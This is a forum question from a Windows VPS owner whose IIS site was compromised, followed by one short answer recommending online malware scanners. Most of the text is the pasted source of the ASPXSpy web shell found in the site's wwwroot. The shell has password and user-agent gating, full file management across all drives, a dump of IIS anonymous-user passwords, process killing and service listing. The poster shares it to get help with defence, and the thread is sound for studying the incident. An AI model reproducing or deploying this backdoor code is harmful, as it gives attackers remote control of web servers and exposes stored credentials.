How can I check vps server security when my hosting has been met attack

Question

I have a Windows 2012 (Datacenter Edition) VPS hosting installed WebsitePanel, today I found that an attacker has uploaded his files under the folder \wwwroot of my a website. I have to delete all the files and the folders under \wwwroot, then upload my site files to the folder \wwwroot again.

I don't know what security problem exists in my system, and I don't know if there are security problem with my asp.net app. And more which permission an attacker has got to upload his files to the \wwwroot? so I'm afraid the attacker's can upload his files to the folder \wwwroot again.

How can I check vps server security? Thanks!

And more I found the Backdoor.ASP.AKspy.e in the uploaded file search.aspx by attacker

<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>
<%@ import Namespace="System.IO"%>
<%@ import Namespace="System.Diagnostics"%>
<%@ import Namespace="System.Data"%>
<%@ import Namespace="System.Management"%>
<%@ import Namespace="System.Data.OleDb"%>
<%@ import Namespace="Microsoft.Win32"%>
<%@ import Namespace="System.Net.Sockets" %>
<%@ import Namespace="System.Net" %>
<%@ import Namespace="System.Runtime.InteropServices"%>
<%@ import Namespace="System.DirectoryServices"%>
<%@ import Namespace="System.ServiceProcess"%>
<%@ import Namespace="System.Text.RegularExpressions"%>
<%@ Import Namespace="System.Threading"%>
<%@ Import Namespace="System.Data.SqlClient"%>
<%@ import Namespace="Microsoft.VisualBasic"%>
<%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
<%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
<%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
<%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server">
/*
Thanks Snailsor,FuYu,BloodSword,Cnqing,
Code by Bin
Make in China
Blog: http://www.rootkit.net.cn
E-mail : master@rootkit.net.cn
*/
public string Password="f31fd2b1efc8b377e9eac5e2747a03fc";//This is a MD5(32)
public string vbhLn="AS-PX-She-ll";
public int TdgGU=1;
protected OleDbConnection Dtdr=new OleDbConnection();
protected OleDbCommand Kkvb=new OleDbCommand();
public NetworkStream NS=null;
public NetworkStream NS1=null;
TcpClient tcp=new TcpClient();
TcpClient zvxm=new TcpClient();
ArrayList IVc=new ArrayList();
protected void Page_load(object sender,EventArgs e)
{
    string agent = System.Web.HttpContext.Current.Request.ServerVariables["HTTP_USER_AGENT"];
            if (!agent.Contains("myccs"))
            {
                Response.End();
            }
YFcNP(this);
fhAEn();
if (!pdo())
{
return;
}
if(IsPostBack)
{
string tkI=Request["__EVENTTARGET"];
string VqV=Request["__File"];
if(tkI!="")
{
switch(tkI)
{
case "Bin_Parent":
krIR(Ebgw(VqV));
break;
case "Bin_Listdir":
krIR(Ebgw(VqV));
break;
case "kRXgt":
kRXgt(Ebgw(VqV));
break;
case "Bin_Createfile":
gLKc(VqV);
break;
case "Bin_Editfile":
gLKc(VqV);
break;
case "Bin_Createdir":
stNPw(VqV);
break;
case "cYAl":
cYAl(VqV);
break;
case "ksGR":
ksGR(Ebgw(VqV));
break;
case "SJv":
SJv(VqV);
break;
case "Bin_Regread":
tpRQ(Ebgw(VqV));
break;
case "hae":
hae();
break;
case "urJG":
urJG(VqV);
break;
}
if(tkI.StartsWith("dAJTD"))
{
dAJTD(Ebgw(tkI.Replace("dAJTD","")),VqV);
}
else if(tkI.StartsWith("Tlvz"))
{
Tlvz(Ebgw(tkI.Replace("Tlvz","")),VqV);
}
else if(tkI.StartsWith("Bin_CFile"))
{
YByN(Ebgw(tkI.Replace("Bin_CFile","")),VqV);
}
}
}
else
{
PBZw();
}
}
public bool pdo()
{
if(Request.Cookies[vbhLn]==null)
{
tZSx();
return false;
}
else
{
if (Request.Cookies[vbhLn].Value != Password)
{
tZSx();
return false;
}
else
{
return true;
}
}
}
public void tZSx()
{
ljtzC.Visible=true;
ZVS.Visible=false;
}
protected void YKpI(object sender,EventArgs e)
{
Session.Abandon();
Response.Cookies.Add(new HttpCookie(vbhLn,null));
tZSx();
}
public void PBZw()
{
ZVS.Visible=true;
//ljtzC.Visible=false;
//Bin_Button_CreateFile.Attributes["onClick"]="var filename=prompt('Please input the file name:','');if(filename){Bin_PostBack('Bin_Createfile',filename);}";
//Bin_Button_CreateDir.Attributes["onClick"]="var filename=prompt('Please input the directory name:','');if(filename){Bin_PostBack('Bin_Createdir',filename);}";
//Bin_Button_KillMe.Attributes["onClick"]="if(confirm('Are you sure delete ASPXSPY?')){Bin_PostBack('hae','');};";
//Bin_Span_Sname.InnerHtml=Request.ServerVariables["LOCAL_ADDR"]+":"+Request.ServerVariables["SERVER_PORT"]+"("+Request.ServerVariables["SERVER_NAME"]+")";
//Bin_Span_FrameVersion.InnerHtml="Framework Ver : "+Environment.Version.ToString();
if (AXSbb.Value==string.Empty)
{
AXSbb.Value=OElM(Server.MapPath("."));
}
Bin_H2_Title.InnerText="File Manager >>";
krIR(AXSbb.Value);
}





public void fhAEn()
{
try
{
string[] YRgt=Directory.GetLogicalDrives();
for(int i=0;i<YRgt.Length;i++)
{
Control c=ParseControl(" <asp:LinkButton Text='"+mFvj(YRgt[i])+"' ID=\"Bin_Button_Driv"+i+"\" runat='server' commandargument= '"+YRgt[i]+"'/> | ");
Bin_Span_Drv.Controls.Add(c);
LinkButton nxeDR=(LinkButton)Page.FindControl("Bin_Button_Driv"+i);
nxeDR.Command+=new CommandEventHandler(this.iVk);
}
}catch(Exception ex){}
}
public string OElM(string path)
{
if(path.Substring(path.Length-1,1)!=@"\")
{
path=path+@"\";
}
return path;
}
public string nrrx(string path)
{
char[] trim={'\\'};
if(path.Substring(path.Length-1,1)==@"\")
{
path=path.TrimEnd(trim);
}
return path;
}
[DllImport("kernel32.dll",EntryPoint="GetDriveTypeA")]
public static extern int OMZP(string nDrive);
public string mFvj(string instr)
{
string EuXD=string.Empty;
int num=OMZP(instr);
switch(num)
{
case 1:
EuXD="Unknow("+instr+")";
break;
case 2:
EuXD="Removable("+instr+")";
break;
case 3:
EuXD="Fixed("+instr+")";
break;
case 4:
EuXD="Network("+instr+")";
break;
case 5:
EuXD="CDRom("+instr+")";
break;
case 6:
EuXD="RAM Disk("+instr+")";
break;
}
return EuXD.Replace(@"\","");
}
public string MVVJ(string instr)
{
byte[] tmp=Encoding.Default.GetBytes(instr);
return Convert.ToBase64String(tmp);
}
public string Ebgw(string instr)
{
byte[] tmp=Convert.FromBase64String(instr);
return Encoding.Default.GetString(tmp);
}
public void krIR(string path)
{
WICxe();
CzfO.Visible=true;
Bin_H2_Title.InnerText="File Manager >>";
AXSbb.Value=OElM(path);
DirectoryInfo GQMM=new DirectoryInfo(path);
if(Directory.GetParent(nrrx(path))!=null)
{
string bg=OKM();
TableRow p=new TableRow();
for(int i=1;i<6;i++)
{
TableCell pc=new TableCell();
if(i==1)
{
pc.Width=Unit.Parse("2%");
pc.Text="0";
p.CssClass=bg;
}
if(i==2)
{
pc.Text="<a href=\"javascript:Bin_PostBack('Bin_Parent','"+MVVJ(Directory.GetParent(nrrx(path)).ToString())+"')\">Parent Directory</a>";
}
p.Cells.Add(pc);
UGzP.Rows.Add(p);
}
}
try
{
int vLlH=0;
foreach(DirectoryInfo Bin_folder in GQMM.GetDirectories())
{
string bg=OKM();
vLlH++;
TableRow tr=new TableRow();
TableCell tc=new TableCell();
tc.Width=Unit.Parse("2%");
tc.Text="0";
tr.Attributes["onmouseover"]="this.className='focus';";
tr.CssClass=bg;
tr.Attributes["onmouseout"]="this.className='"+bg+"';";
tr.Cells.Add(tc);
TableCell HczyN=new TableCell();
HczyN.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(AXSbb.Value+Bin_folder.Name)+"')\">"+Bin_folder.Name+"</a>";
tr.Cells.Add(HczyN);
TableCell LYZK=new TableCell();
LYZK.Text=Bin_folder.LastWriteTimeUtc.ToString("yyyy-MM-dd hh:mm:ss");
tr.Cells.Add(LYZK);
UGzP.Rows.Add(tr);
TableCell ERUL=new TableCell();
ERUL.Text="--";
tr.Cells.Add(ERUL);
UGzP.Rows.Add(tr);
TableCell ZGKh=new TableCell();
ZGKh.Text="<a href=\"javascript:if(confirm('Are you sure will delete it ?\\n\\nIf non-empty directory,will be delete all the files.')){Bin_PostBack('kRXgt','"+MVVJ(AXSbb.Value+Bin_folder.Name)+"')};\">Del</a> | <a href='#' onclick=\"var filename=prompt('Please input the new folder name:','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_folder.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('dAJTD"+MVVJ(AXSbb.Value+Bin_folder.Name)+"',filename);} \">Rename</a>";
tr.Cells.Add(ZGKh);
UGzP.Rows.Add(tr);
}
TableRow cKVA=new TableRow();
cKVA.Attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;";
cKVA.Attributes["bgcolor"]="#dddddd";
TableCell JlmW=new TableCell();
JlmW.Attributes["colspan"]="6" ;
JlmW.Attributes["height"]="5";
cKVA.Cells.Add(JlmW);
UGzP.Rows.Add(cKVA);
int aYRwo=0;
foreach(FileInfo Bin_Files in GQMM.GetFiles())
{
aYRwo++;
string gb=OKM();
TableRow tr=new TableRow();
TableCell tc=new TableCell();
tc.Width=Unit.Parse("2%");
tc.Text="<input type=\"checkbox\" value=\"0\" name=\""+MVVJ(Bin_Files.Name)+"\">";
tr.Attributes["onmouseover"]="this.className='focus';";
tr.CssClass=gb;
tr.Attributes["onmouseout"]="this.className='"+gb+"';";
tr.Cells.Add(tc);
TableCell filename=new TableCell();
if(Bin_Files.FullName.StartsWith(Request.PhysicalApplicationPath))
{
string url=Request.Url.ToString();
filename.Text="<a href=\""+Bin_Files.FullName.Replace(Request.PhysicalApplicationPath,url.Substring(0,url.IndexOf('/',8)+1)).Replace("\\","/")+"\" target=\"_blank\">"+Bin_Files.Name+"</a>";
}
else
{
filename.Text=Bin_Files.Name;
}
TableCell albt=new TableCell();
albt.Text=Bin_Files.LastWriteTimeUtc.ToString("yyyy-MM-dd hh:mm:ss");
TableCell YzK=new TableCell();
YzK.Text=mTG(Bin_Files.Length);
TableCell GLpi=new TableCell();
GLpi.Text="<a href=\"#\" onclick=\"Bin_PostBack('ksGR','"+MVVJ(AXSbb.Value+Bin_Files.Name)+"')\">Down</a> | <a href='#' onclick=\"var filename=prompt('Please input the new path(full path):','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_Files.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('Bin_CFile"+MVVJ(AXSbb.Value+Bin_Files.Name)+"',filename);} \">Copy</a> | <a href=\"#\" onclick=\"Bin_PostBack('Bin_Editfile','"+Bin_Files.Name+"')\">Edit</a> | <a href='#' onclick=\"var filename=prompt('Please input the new file name(full path):','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_Files.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('Tlvz"+MVVJ(AXSbb.Value+Bin_Files.Name)+"',filename);} \">Rename</a> | <a href=\"#\" onclick=\"Bin_PostBack('cYAl','"+Bin_Files.Name+"')\">Time</a> ";
tr.Cells.Add(filename);
tr.Cells.Add(albt);
tr.Cells.Add(YzK);
tr.Cells.Add(GLpi);
UGzP.Rows.Add(tr);
}
string lgb=OKM();
TableRow oWam=new TableRow();
oWam.CssClass=lgb;
for(int i=1;i<4;i++)
{
TableCell lGV=new TableCell();
if(i==1)
{
lGV.Text="<input name=\"chkall\" value=\"on\" type=\"checkbox\" onclick=\"var ck=document.getElementsByTagName('input');for(var i=0;i<ck.length-1;i++){if(ck[i].type=='checkbox'&&ck[i].name!='chkall'){ck[i].checked=forms[0].chkall.checked;}}\"/>";
}
if(i==2)
{
lGV.Text="<a href=\"#\" Onclick=\"var d_file='';var ck=document.getElementsByTagName('input');for(var i=0;i<ck.length-1;i++){if(ck[i].checked&&ck[i].name!='chkall'){d_file+=ck[i].name+',';}};if(d_file==null || d_file==''){ return;} else {if(confirm('Are you sure delete the files ?')){Bin_PostBack('SJv',d_file)};}\">Delete selected</a>";
}
if(i==3)
{
lGV.ColumnSpan=4;
lGV.Style.Add("text-align","right");
lGV.Text=vLlH+" directories/ "+aYRwo+" files";
}
oWam.Cells.Add(lGV);
}
UGzP.Rows.Add(oWam);
}
catch(Exception error)
{
xseuB(error.Message);
}
}
public string OKM()
{
TdgGU++;
if(TdgGU % 2==0)
{
return "alt1";
}
else
{
return "alt2";
}
}
public void kRXgt(string qcKu)
{
try
{
Directory.Delete(qcKu,true);
xseuB("Directory delete new success !");
}
catch(Exception error)
{
xseuB(error.Message);
}
krIR(Directory.GetParent(qcKu).ToString());
}
public void dAJTD(string sdir,string ddir)
{
try
{
Directory.Move(sdir,ddir);
xseuB("Directory Renamed Success !");
}
catch(Exception error)
{
xseuB(error.Message);
}
krIR(AXSbb.Value);
}
public void Tlvz(string sfile,string dfile)
{
try
{
File.Move(sfile,dfile);
xseuB("File Renamed Success !");
}
catch(Exception error)
{
xseuB(error.Message);
}
krIR(AXSbb.Value);
}
public void YByN(string spath,string dpath)
{
try
{
File.Copy(spath,dpath);
xseuB("File Copy Success !");
}
catch(Exception error)
{
xseuB(error.Message);
}
krIR(AXSbb.Value);
}
public void stNPw(string path)
{
try
{
Directory.CreateDirectory(AXSbb.Value+path);
xseuB("Directory created success !");
}
catch(Exception error)
{
xseuB(error.Message);
}
krIR(AXSbb.Value);
}
public void gLKc(string path)
{
if(Request["__EVENTTARGET"]=="Bin_Editfile" || Request["__EVENTTARGET"]=="Bin_Createfile")
{
foreach(ListItem item in NdCX.Items)
{
if(item.Selected=true)
{
item.Selected=false;
}
}
}
Bin_H2_Title.InnerHtml="Create/ Edit File >>";
WICxe();
vrFA.Visible=true;
if(path.IndexOf(":")< 0)
{
Sqon.Value=AXSbb.Value+path;
}
else
{
Sqon.Value=path;
}
if(File.Exists(Sqon.Value))
{
StreamReader sr;
if(NdCX.SelectedItem.Text=="UTF-8")
{
sr=new StreamReader(Sqon.Value,Encoding.UTF8);
}
else
{
sr=new StreamReader(Sqon.Value,Encoding.Default);
}
Xgvv.InnerText=sr.ReadToEnd();
sr.Close();
}
else
{
Xgvv.InnerText=string.Empty;
}
}
public void ksGR(string path)
{
FileInfo fs=new FileInfo(path);
Response.Clear();
Page.Response.ClearHeaders();
Page.Response.Buffer=false;
this.EnableViewState=false;
Response.AddHeader("Content-Disposition","attachment;filename="+HttpUtility.UrlEncode(fs.Name,System.Text.Encoding.UTF8));
Response.AddHeader("Content-Length",fs.Length.ToString());
Page.Response.ContentType="application/unknown";
Response.WriteFile(fs.FullName);
Page.Response.Flush();
Page.Response.Close();
Response.End();
Page.Response.Clear();
}
public void SJv(string path)
{
try
{
string[] spdT=path.Split(',');
for(int i=0;i<spdT.Length-1;i++)
{
File.Delete(AXSbb.Value+Ebgw(spdT[i]));
}
xseuB("File Delete Success !");
}
catch(Exception error)
{
xseuB(error.Message);
}
krIR(AXSbb.Value);
}
public void hae()
{
try
{
File.Delete(Request.PhysicalPath);
Response.Redirect("http://www.rootkit.net.cn");
}
catch(Exception error)
{
xseuB(error.Message);
}
}
public void cYAl(string path)
{
Bin_H2_Title.InnerHtml="Clone file was last modified time >>";
WICxe();
zRyG.Visible=true;
QiFB.Value=AXSbb.Value+path;
lICp.Value=AXSbb.Value;
pWVL.Value=AXSbb.Value+path;
string Att=File.GetAttributes(QiFB.Value).ToString();
if(Att.LastIndexOf("ReadOnly")!=-1)
{
ZhWSK.Checked=true;
}
if(Att.LastIndexOf("System")!=-1)
{
SsR.Checked=true;
}
if(Att.LastIndexOf("Hidden")!=-1)
{
ccB.Checked=true;
}
if(Att.LastIndexOf("Archive")!=-1)
{
fbyZ.Checked=true;
}
yUqx.Value=File.GetCreationTimeUtc(pWVL.Value).ToString();
uYjw.Value=File.GetLastWriteTimeUtc(pWVL.Value).ToString();
aLsn.Value=File.GetLastAccessTimeUtc(pWVL.Value).ToString();
}
public static String mTG(Int64 fileSize)
{
if(fileSize<0)
{
throw new ArgumentOutOfRangeException("fileSize");
}
else if(fileSize >= 1024 * 1024 * 1024)
{
return string.Format("{0:########0.00} G",((Double)fileSize)/(1024 * 1024 * 1024));
}
else if(fileSize >= 1024 * 1024)
{
return string.Format("{0:####0.00} M",((Double)fileSize)/(1024 * 1024));
}
else if(fileSize >= 1024)
{
return string.Format("{0:####0.00} K",((Double)fileSize)/ 1024);
}
else
{
return string.Format("{0} B",fileSize);
}
}
private bool SGde(string sSrc)
{
Regex reg=new Regex(@"^0|[0-9]*[1-9][0-9]*$");
if(reg.IsMatch(sSrc))
{
return true;
}
else
{
return false;
}
}
public void AdCx()
{
string qcKu=string.Empty;
string mWGEm="IIS://localhost/W3SVC";
GlI.Style.Add("word-break","break-all");
try
{
DirectoryEntry HHzcY=new DirectoryEntry(mWGEm);
int fmW=0;
foreach(DirectoryEntry child in HHzcY.Children)
{
if(SGde(child.Name.ToString()))
{
fmW++;
DirectoryEntry newdir=new DirectoryEntry(mWGEm+"/"+child.Name.ToString());
DirectoryEntry HlyU=newdir.Children.Find("root","IIsWebVirtualDir");
string bg=OKM();
TableRow TR=new TableRow();
TR.Attributes["onmouseover"]="this.className='focus';";
TR.CssClass=bg;
TR.Attributes["onmouseout"]="this.className='"+bg+"';";
TR.Attributes["title"]="Site:"+child.Properties["ServerComment"].Value.ToString();
for(int i=1;i<6;i++)
{
try
{
TableCell tfit=new TableCell();
switch(i)
{case 1:
tfit.Text=fmW.ToString();
break;
case 2:
tfit.Text=HlyU.Properties["AnonymousUserName"].Value.ToString();
break;
case 3:
tfit.Text=HlyU.Properties["AnonymousUserPass"].Value.ToString();
break;
case 4:
StringBuilder sb=new StringBuilder();
PropertyValueCollection pc=child.Properties["ServerBindings"];
for (int j=0; j < pc.Count; j++)
{
sb.Append(pc[j].ToString()+"<br>");
}
tfit.Text=sb.ToString().Substring(0,sb.ToString().Length-4);
break;
case 5:
tfit.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(HlyU.Properties["Path"].Value.ToString())+"')\">"+HlyU.Properties["Path"].Value.ToString()+"</a>";
break;
}
TR.Cells.Add(tfit);
}
catch (Exception ex)
{
xseuB(ex.Message);
continue;
}
}
GlI.Controls.Add(TR);
}
}
}
catch(Exception ex)
{
xseuB(ex.Message);
}
}
public ManagementObjectCollection PhQTd(string query)
{
ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query));
return QS.Get();
}
public DataTable cCf(string query)
{
DataTable dt=new DataTable();
int i=0;
ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query));
try
{
foreach(ManagementObject m in QS.Get())
{
DataRow dr=dt.NewRow();
PropertyDataCollection.PropertyDataEnumerator oEnum;
oEnum=(m.Properties.GetEnumerator()as PropertyDataCollection.PropertyDataEnumerator);
while(oEnum.MoveNext())
{
PropertyData DRU=(PropertyData)oEnum.Current;
if(dt.Columns.IndexOf(DRU.Name)==-1)
{
dt.Columns.Add(DRU.Name);
dt.Columns[dt.Columns.Count-1].DefaultValue="";
}
if(m[DRU.Name]!=null)
{
dr[DRU.Name]=m[DRU.Name].ToString();
}
else
{
dr[DRU.Name]=string.Empty;
}
}
dt.Rows.Add(dr);
}
}
catch(Exception error)
{
}
return dt;
}
public void YUw()
{
try
{
Bin_H2_Title.InnerText="Process >>";
WICxe();
DCbS.Visible=true;
int UEbTI=0;
Process[] p=Process.GetProcesses();
foreach(Process sp in p)
{
UEbTI++;
string bg=OKM();
TableRow tr=new TableRow();
tr.Attributes["onmouseover"]="this.className='focus';";
tr.CssClass=bg;
tr.Attributes["onmouseout"]="this.className='"+bg+"';";
for(int i=1;i<7;i++)
{
TableCell td=new TableCell();
if(i==1)
{
td.Width=Unit.Parse("2%");
td.Text=UEbTI.ToString();
tr.Controls.Add(td);
}
if(i==2)
{
td.Text=sp.Id.ToString();
tr.Controls.Add(td);
}
if(i==3)
{
td.Text=sp.ProcessName.ToString();
tr.Controls.Add(td);
}
if(i==4)
{
td.Text=sp.Threads.Count.ToString();
tr.Controls.Add(td);
}
if(i==5)
{
td.Text=sp.BasePriority.ToString();
tr.Controls.Add(td);
}
if(i==6)
{
td.Text="--";
tr.Controls.Add(td);
}
}
IjsL.Controls.Add(tr);
}
}
catch(Exception error)
{
AIz();
}
AIz();
}
public void AIz()
{
try
{
Bin_H2_Title.InnerText="Process >>";
WICxe();
DCbS.Visible=true;
int UEbTI=0;
DataTable dt=cCf("Win32_Process");
for(int j=0;j<dt.Rows.Count;j++)
{
UEbTI++;
string bg=OKM();
TableRow tr=new TableRow();
tr.Attributes["onmouseover"]="this.className='focus';";
tr.CssClass=bg;
tr.Attributes["onmouseout"]="this.className='"+bg+"';";
for(int i=1;i<7;i++)
{
TableCell td=new TableCell();
if(i==1)
{
td.Width=Unit.Parse("2%");
td.Text=UEbTI.ToString();
tr.Controls.Add(td);
}
if(i==2)
{
td.Text=dt.Rows[j]["ProcessID"].ToString();
tr.Controls.Add(td);
}
if(i==3)
{
td.Text=dt.Rows[j]["Name"].ToString();
tr.Controls.Add(td);
}
if(i==4)
{
td.Text=dt.Rows[j]["ThreadCount"].ToString();
tr.Controls.Add(td);
}
if(i==5)
{
td.Text=dt.Rows[j]["Priority"].ToString();
tr.Controls.Add(td);
}
if(i==6)
{
if( dt.Rows[j]["CommandLine"]!=string.Empty)
{
td.Text="<a href=\"javascript:Bin_PostBack('urJG','"+dt.Rows[j]["ProcessID"].ToString()+"')\">Kill</a>";
}
else
{
td.Text="--";
}
tr.Controls.Add(td);
}
}
IjsL.Controls.Add(tr);
}
}
catch(Exception error)
{
xseuB(error.Message);
}
}
public void urJG(string pid)
{
try
{
foreach(ManagementObject p in PhQTd("Select * from Win32_Process Where ProcessID ='"+pid+"'"))
{
p.InvokeMethod("Terminate",null);
p.Dispose();
}
xseuB("Process Kill Success !");
}
catch(Exception error)
{
xseuB(error.Message);
}
AIz();
}
public void oHpF()
{
try
{
Bin_H2_Title.InnerText="Services >>";
WICxe();
iQxm.Visible=true;
int UEbTI=0;
ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();
for(int i=0;i<kQmRu.Length;i++)
{
UEbTI++;
string bg=OKM();
TableRow tr=new TableRow();
tr.Attributes["onmouseover"]="this.className='focus';";
tr.CssClass=bg;
tr.Attributes["onmouseout"]="this.className='"+bg+"';";
for(int b=1;b<7;b++)
{
TableCell td=new TableCell();
if(b==1)
{
td.Width=Unit.Parse("2%");
td.Text=UEbTI.ToString();
tr.Controls.Add(td);
}
if(b==2)
{
td.Text="null";
tr.Controls.Add(td);
}
if(b==3)
{
td.Text=kQmRu[i].ServiceName.ToString();
tr.Controls.Add(td);
}
if(b==4)
{
td.Text="";
tr.Controls.Add(td);
}
if(b==5)
{
string kOIo=kQmRu[i].Status.ToString();
if(kOIo=="Running")
{
td.Text="<font color=green>"+kOIo+"</font>";
}
else
{
td.Text="<font color=red>"+kOIo+"</font>";
}
tr.Controls.Add(td);
}
if(b==6)
{
td.Text="";
tr.Controls.Add(td);
}
}
vHCs.Controls.Add(tr);
}
}
catch(Exception error)
{
xseuB(error.Message);
}
}

Answer 1

I suggest sucuri to detect the malwares on a website

Use http://sitecheck.sucuri.net to determine if your website is compromised or not.

Or you can use some paid service, they scan the server for vulnerabilities:

https://www.securitymetrics.com/sm/pub/